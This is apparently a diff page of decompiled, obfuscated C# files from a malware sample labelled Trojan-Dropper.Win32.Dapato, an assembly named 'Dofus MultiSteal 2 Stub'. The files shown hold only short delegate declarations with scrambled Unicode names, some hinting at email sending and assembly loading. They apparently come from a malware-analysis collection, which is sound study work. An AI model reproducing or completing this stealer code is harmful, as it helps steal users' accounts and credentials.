// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
internal delegate string \u1940艏魿ᑵ舢팏遱㱕(string[] _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/᧻⌍伐㫬넚앺騠.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: ᧻⌍伐㫬넚앺騠
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System.Runtime.InteropServices;
internal delegate void \u19FB\u230D伐㫬넚\uE748앺騠([In] object obj0);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ᩐ⑇셎⵷婞￘₍.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: ᩐ⑇셎⵷婞￘₍
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System.Runtime.InteropServices;
internal delegate object \u2447셎\u2D77婞\uFFD8\u208D\uED0A([In] object obj0, string _param2);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/᭥姲匌飗眽탲롯.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: ᭥姲匌飗眽탲롯
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System;
internal delegate Delegate \u1B65姲匌飗眽탲롯\uEEB3(Delegate _param1, Delegate _param2);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ᶰﮎ◐薤얷钃ꊮ琸.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: ᶰﮎ◐薤얷钃ꊮ琸
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
internal delegate object \u25D0薤얷钃ꊮ琸(object _param1, object _param2);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ḙṽⰆ祫톛嗁鷶.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: ḙṽⰆ祫톛嗁鷶
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System.Net.Mail;
internal delegate MailAddress \uE4AF(string _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/⃻꬝㈨燽⮊ꭎⱘ녧.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: ⃻꬝㈨燽⮊ꭎⱘ녧
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System.Reflection;
internal delegate Assembly \u20FB\uAB1D\u3228燽\u2B8Aꭎⱘ녧();
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ℼ缼▔졚꾩F覻.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: ℼ缼▔졚꾩F覻
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System.Runtime.InteropServices;
internal delegate \uE576\u3015\u2764ྵ\u225D泐 \u2594졚꾩\uE1C5F覻(
[In] object obj0);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ⅻ稷䝟롈⇀ㆄ.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: ⅻ稷䝟롈⇀ㆄ
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System.Runtime.InteropServices;
internal delegate void \uE49E稷䝟롈\u21C0ㆄ\uE63D([In] object obj0);

Some files were not shown because too many files have changed in this diff Show More